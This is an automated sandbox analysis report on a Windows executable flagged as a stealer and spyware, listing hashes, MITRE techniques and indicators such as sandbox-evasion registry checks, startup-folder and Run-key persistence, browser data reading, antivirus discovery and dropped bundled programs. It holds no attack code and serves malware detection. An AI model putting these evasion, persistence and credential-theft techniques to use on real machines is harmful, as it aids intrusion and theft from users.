fea70f1113b11df7ee03d4889418d06d1fa1f99d705aafdbdbfbace317812452

Analysis

max time kernel
151s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
04-05-2022 13:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

--d8kxdir.exe
Size

7.5MB
MD5

275c014963f2ef27dd3e39e9c60d9da7
SHA1

53bf33dad945c79396eefdadd9f94f0c98750ba1
SHA256

7dcbc5676b17a35dfff8197bddd6c3b4575b2ec8e3f46afe3521983400d996ce
SHA512

ba0e2577d8761c649ab2bd7d0888d3c079b41c9fe4e7103d5698862df12b2e1c38c6233baac6cd9c0ccb422b36e44d5a3d7e46f7311aa099149ad41137b67b4d

Score

9^/10

discovery persistence spyware stealer upx

Malware Config

Signatures

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\is-QOJ7Q.tmp\ApiTool.dll	acprotect
C:\Users\Admin\AppData\Local\Temp\is-QOJ7Q.tmp\ApiTool.dll	acprotect

Downloads MZ/PE file

Drops file in Drivers directory 3 IoCs

Processes:

DrvInst.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\SET215E.tmp	DrvInst.exe
File created	C:\Windows\System32\drivers\SET215E.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\drivers\tap0901.sys	DrvInst.exe

Executes dropped EXE 18 IoCs

Processes:

is-HJLGP.tmpPCCleaner.exePCCleaner.exeyRsXtHTgGrW6NY8ct.exez9lPVDj9zZUU2uf3mPY.exeyRsXtHTgGrW6NY8ct.tmpaTMvS4.execlient.exeis-F8424.tmprdrhfsp.exeLoy6GQKfoZWtolK.exevpn.exevpn.tmptapinstall.exetapinstall.exemask_svc.exemask_svc.exemask_svc.exe

pid	process
1624	is-HJLGP.tmp
4672	PCCleaner.exe
1060	PCCleaner.exe
4352	yRsXtHTgGrW6NY8ct.exe
2940	z9lPVDj9zZUU2uf3mPY.exe
4572	yRsXtHTgGrW6NY8ct.tmp
1236	aTMvS4.exe
3008	client.exe
5144	is-F8424.tmp
5276	rdrhfsp.exe
5400	Loy6GQKfoZWtolK.exe
4304	vpn.exe
1364	vpn.tmp
5812	tapinstall.exe
5844	tapinstall.exe
1964	mask_svc.exe
5620	mask_svc.exe
5960	mask_svc.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\is-QOJ7Q.tmp\ApiTool.dll	upx
C:\Users\Admin\AppData\Local\Temp\is-QOJ7Q.tmp\ApiTool.dll	upx

Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Loy6GQKfoZWtolK.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Loy6GQKfoZWtolK.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Loy6GQKfoZWtolK.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Loy6GQKfoZWtolK.exevpn.tmprdrhfsp.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	Loy6GQKfoZWtolK.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	vpn.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	rdrhfsp.exe

Drops startup file 1 IoCs

Processes:

yRsXtHTgGrW6NY8ct.tmp

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Proxy2Service.lnk yRsXtHTgGrW6NY8ct.tmp

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Proxy2Service.lnk	yRsXtHTgGrW6NY8ct.tmp

Loads dropped DLL 20 IoCs

Processes:

is-HJLGP.tmpis-F8424.tmpvpn.tmpmask_svc.exe

pid	process
1624	is-HJLGP.tmp
1624	is-HJLGP.tmp
1624	is-HJLGP.tmp
5144	is-F8424.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
1364	vpn.tmp
5960	mask_svc.exe
5960	mask_svc.exe
5960	mask_svc.exe
5960	mask_svc.exe
5960	mask_svc.exe
5960	mask_svc.exe
1364	vpn.tmp
1364	vpn.tmp

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

msedge.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe

Checks for any installed AV software in registry 1 TTPs 4 IoCs

Security Software Discovery

T1063

Processes:

PCCleaner.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Avira\AntiVir Desktop\Build	PCCleaner.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop\Build	PCCleaner.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Avira\AntiVir Desktop	PCCleaner.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop	PCCleaner.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in System32 directory 17 IoCs

Processes:

DrvInst.exeLoy6GQKfoZWtolK.exetapinstall.exe

description	ioc	process
File opened for modification	C:\Windows\System32\DriverStore\Temp\{825076c3-9961-264d-b6e5-2d7563e835c7}\tap0901.cat	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{825076c3-9961-264d-b6e5-2d7563e835c7}\SET1BC2.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys	DrvInst.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{825076c3-9961-264d-b6e5-2d7563e835c7}\oemvista.inf	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{825076c3-9961-264d-b6e5-2d7563e835c7}\SET1BC1.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{825076c3-9961-264d-b6e5-2d7563e835c7}	DrvInst.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Loy6GQKfoZWtolK.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{825076c3-9961-264d-b6e5-2d7563e835c7}\SET1BC1.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\drvstore.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat	DrvInst.exe
File created	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF	tapinstall.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{825076c3-9961-264d-b6e5-2d7563e835c7}\SET1BC0.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{825076c3-9961-264d-b6e5-2d7563e835c7}\SET1BC0.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{825076c3-9961-264d-b6e5-2d7563e835c7}\SET1BC2.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{825076c3-9961-264d-b6e5-2d7563e835c7}\tap0901.sys	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf	DrvInst.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

Processes:

mask_svc.exemask_svc.exemask_svc.exe

pid process

1964 mask_svc.exe
5620 mask_svc.exe
5960 mask_svc.exe

pid	process
1964	mask_svc.exe
5620	mask_svc.exe
5960	mask_svc.exe

Drops file in Program Files directory 64 IoCs

Processes:

vpn.tmpis-HJLGP.tmpis-F8424.tmpclient.exeyRsXtHTgGrW6NY8ct.tmpsetup.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\MaskVPN\ssleay32.dll	vpn.tmp
File created	C:\Program Files (x86)\Synes\PCCleaner\is-LQ3AS.tmp	is-HJLGP.tmp
File created	C:\Program Files (x86)\Synes\PCCleaner\lang\el-GR\is-ILN7R.tmp	is-HJLGP.tmp
File created	C:\Program Files (x86)\Synes\PCCleaner\lang\it-IT\is-0H6ER.tmp	is-HJLGP.tmp
File created	C:\Program Files (x86)\Data Recovery\manual_sr\is-OHNVK.tmp	is-F8424.tmp
File created	C:\Program Files (x86)\Data Recovery\manual_sr\is-ALAAM.tmp	is-F8424.tmp
File created	C:\Program Files (x86)\Synes\PCCleaner\lang\is-AO34D.tmp	is-HJLGP.tmp
File created	C:\Program Files (x86)\Synes\PCCleaner\lang\hr-BA\is-P0FC2.tmp	is-HJLGP.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-9RP5F.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-DE69J.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-ABHC2.tmp	vpn.tmp
File created	C:\Program Files (x86)\Synes\PCCleaner\lang\fr-FR\is-LFLDC.tmp	is-HJLGP.tmp
File created	C:\Program Files (x86)\Synes\PCCleaner\lang\it-IT\is-9TPCK.tmp	is-HJLGP.tmp
File created	C:\Program Files (x86)\Synes\PCCleaner\is-NN40Q.tmp	is-HJLGP.tmp
File created	C:\Program Files (x86)\Data Recovery\manual_sr\is-PG9T1.tmp	is-F8424.tmp
File opened for modification	C:\Program Files (x86)\Proxy2Service\p2pminimal.log	client.exe
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-FAEGM.tmp	vpn.tmp
File created	C:\Program Files (x86)\Data Recovery\manual_sr\is-93Q4G.tmp	is-F8424.tmp
File created	C:\Program Files (x86)\MaskVPN\is-M889R.tmp	vpn.tmp
File created	C:\Program Files (x86)\Synes\PCCleaner\lang\is-OSD3P.tmp	is-HJLGP.tmp
File created	C:\Program Files (x86)\Synes\PCCleaner\lang\de-DE\is-V93OQ.tmp	is-HJLGP.tmp
File created	C:\Program Files (x86)\Synes\PCCleaner\lang\tr-TR\is-Q47AB.tmp	is-HJLGP.tmp
File created	C:\Program Files (x86)\Data Recovery\is-R8T85.tmp	is-F8424.tmp
File created	C:\Program Files (x86)\Data Recovery\manual_sr\is-V7JQM.tmp	is-F8424.tmp
File created	C:\Program Files (x86)\Data Recovery\manual_sr\is-FJTA7.tmp	is-F8424.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-JPSP2.tmp	vpn.tmp
File created	C:\Program Files (x86)\Synes\PCCleaner\lang\is-3LOPC.tmp	is-HJLGP.tmp
File opened for modification	C:\Program Files (x86)\Proxy2Service\client.exe	yRsXtHTgGrW6NY8ct.tmp
File created	C:\Program Files (x86)\Data Recovery\is-U419O.tmp	is-F8424.tmp
File created	C:\Program Files (x86)\Data Recovery\manual_sr\is-86NC4.tmp	is-F8424.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\libCommon.dll	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-8EVKE.tmp	vpn.tmp
File created	C:\Program Files (x86)\Synes\PCCleaner\unins000.dat	is-HJLGP.tmp
File created	C:\Program Files (x86)\Synes\PCCleaner\lang\ar-SA\is-K40DM.tmp	is-HJLGP.tmp
File opened for modification	C:\Program Files (x86)\Synes\PCCleaner\PCCleaner.exe	is-HJLGP.tmp
File created	C:\Program Files (x86)\MaskVPN\is-QDD7M.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-3I9H5.tmp	vpn.tmp
File created	C:\Program Files (x86)\Synes\PCCleaner\lang\tr-TR\is-GP99F.tmp	is-HJLGP.tmp
File created	C:\Program Files (x86)\Data Recovery\is-RCIT1.tmp	is-F8424.tmp
File created	C:\Program Files (x86)\Data Recovery\manual_sr\is-ONLIJ.tmp	is-F8424.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\tunnle.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-IKGP2.tmp	vpn.tmp
File created	C:\Program Files (x86)\Data Recovery\manual_sr\is-64FN0.tmp	is-F8424.tmp
File created	C:\Program Files (x86)\Synes\PCCleaner\lang\is-75QPP.tmp	is-HJLGP.tmp
File created	C:\Program Files (x86)\Synes\PCCleaner\lang\nl-NL\is-1B216.tmp	is-HJLGP.tmp
File opened for modification	C:\Program Files (x86)\Synes\PCCleaner\unins000.dat	is-HJLGP.tmp
File created	C:\Program Files (x86)\Data Recovery\manual_sr\is-KPUQ6.tmp	is-F8424.tmp
File created	C:\Program Files (x86)\Data Recovery\manual_sr\is-E98CI.tmp	is-F8424.tmp
File created	C:\Program Files (x86)\Synes\PCCleaner\lang\de-DE\is-0RFAP.tmp	is-HJLGP.tmp
File created	C:\Program Files (x86)\Data Recovery\manual_sr\is-JQLE3.tmp	is-F8424.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-4IRJS.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-25KOA.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\unins000.dat	vpn.tmp
File created	C:\Program Files (x86)\Synes\PCCleaner\lang\is-LEE6K.tmp	is-HJLGP.tmp
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220504151610.pma	setup.exe
File created	C:\Program Files (x86)\MaskVPN\is-VMHHQ.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-2GA1V.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-0HMJH.tmp	vpn.tmp
File created	C:\Program Files (x86)\Data Recovery\manual_sr\is-V43NS.tmp	is-F8424.tmp
File created	C:\Program Files (x86)\Synes\PCCleaner\lang\is-RKIC0.tmp	is-HJLGP.tmp
File created	C:\Program Files (x86)\Synes\PCCleaner\lang\is-19DI6.tmp	is-HJLGP.tmp
File created	C:\Program Files (x86)\Synes\PCCleaner\lang\is-P2MPB.tmp	is-HJLGP.tmp

Drops file in Windows directory 7 IoCs

Processes:

DrvInst.exeDrvInst.exeschtasks.exetapinstall.exesvchost.exe

description	ioc	process
File opened for modification	C:\Windows\inf\oem2.inf	DrvInst.exe
File created	C:\Windows\inf\oem2.inf	DrvInst.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File created	C:\Windows\Tasks\bBozjCWLIxbVSsixmx.job	schtasks.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	tapinstall.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	svchost.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 58 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
5052	4672	WerFault.exe	PCCleaner.exe
4528	4672	WerFault.exe	PCCleaner.exe
3108	4672	WerFault.exe	PCCleaner.exe
4860	1060	WerFault.exe	PCCleaner.exe
4960	1060	WerFault.exe	PCCleaner.exe
1104	1060	WerFault.exe	PCCleaner.exe
620	1060	WerFault.exe	PCCleaner.exe
4740	1060	WerFault.exe	PCCleaner.exe
3220	1060	WerFault.exe	PCCleaner.exe
1964	1060	WerFault.exe	PCCleaner.exe
2964	1060	WerFault.exe	PCCleaner.exe
2832	1060	WerFault.exe	PCCleaner.exe
3004	1060	WerFault.exe	PCCleaner.exe
3516	1060	WerFault.exe	PCCleaner.exe
3548	1060	WerFault.exe	PCCleaner.exe
4624	1060	WerFault.exe	PCCleaner.exe
4948	1060	WerFault.exe	PCCleaner.exe
3500	1060	WerFault.exe	PCCleaner.exe
1884	1060	WerFault.exe	PCCleaner.exe
2788	1060	WerFault.exe	PCCleaner.exe
2876	1060	WerFault.exe	PCCleaner.exe
4572	1060	WerFault.exe	PCCleaner.exe
1332	1060	WerFault.exe	PCCleaner.exe
2260	1060	WerFault.exe	PCCleaner.exe
1844	1060	WerFault.exe	PCCleaner.exe
3556	1060	WerFault.exe	PCCleaner.exe
1884	1060	WerFault.exe	PCCleaner.exe
1844	1060	WerFault.exe	PCCleaner.exe
4572	1060	WerFault.exe	PCCleaner.exe
4664	1060	WerFault.exe	PCCleaner.exe
3976	1060	WerFault.exe	PCCleaner.exe
1200	1060	WerFault.exe	PCCleaner.exe
3716	1060	WerFault.exe	PCCleaner.exe
2936	1060	WerFault.exe	PCCleaner.exe
2936	1060	WerFault.exe	PCCleaner.exe
5152	1060	WerFault.exe	PCCleaner.exe
5408	1060	WerFault.exe	PCCleaner.exe
5584	1060	WerFault.exe	PCCleaner.exe
5828	1060	WerFault.exe	PCCleaner.exe
6012	1060	WerFault.exe	PCCleaner.exe
6120	1060	WerFault.exe	PCCleaner.exe
5168	1060	WerFault.exe	PCCleaner.exe
5096	1060	WerFault.exe	PCCleaner.exe
5308	1060	WerFault.exe	PCCleaner.exe
5180	4260	WerFault.exe
5584	1060	WerFault.exe	PCCleaner.exe
5928	1060	WerFault.exe	PCCleaner.exe
6024	1060	WerFault.exe	PCCleaner.exe
3692	1060	WerFault.exe	PCCleaner.exe
428	1060	WerFault.exe	PCCleaner.exe
5264	1060	WerFault.exe	PCCleaner.exe
4548	1060	WerFault.exe	PCCleaner.exe
4784	1060	WerFault.exe	PCCleaner.exe
1076	1060	WerFault.exe	PCCleaner.exe
3328	1060	WerFault.exe	PCCleaner.exe
5608	1060	WerFault.exe	PCCleaner.exe
1636	1060	WerFault.exe	PCCleaner.exe
5296	1060	WerFault.exe	PCCleaner.exe

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

svchost.exeDrvInst.exesvchost.exeDrvInst.exetapinstall.exetapinstall.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\LowerFilters	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Filters	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID	tapinstall.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\DeviceDesc	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	tapinstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Filters	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D	svchost.exe
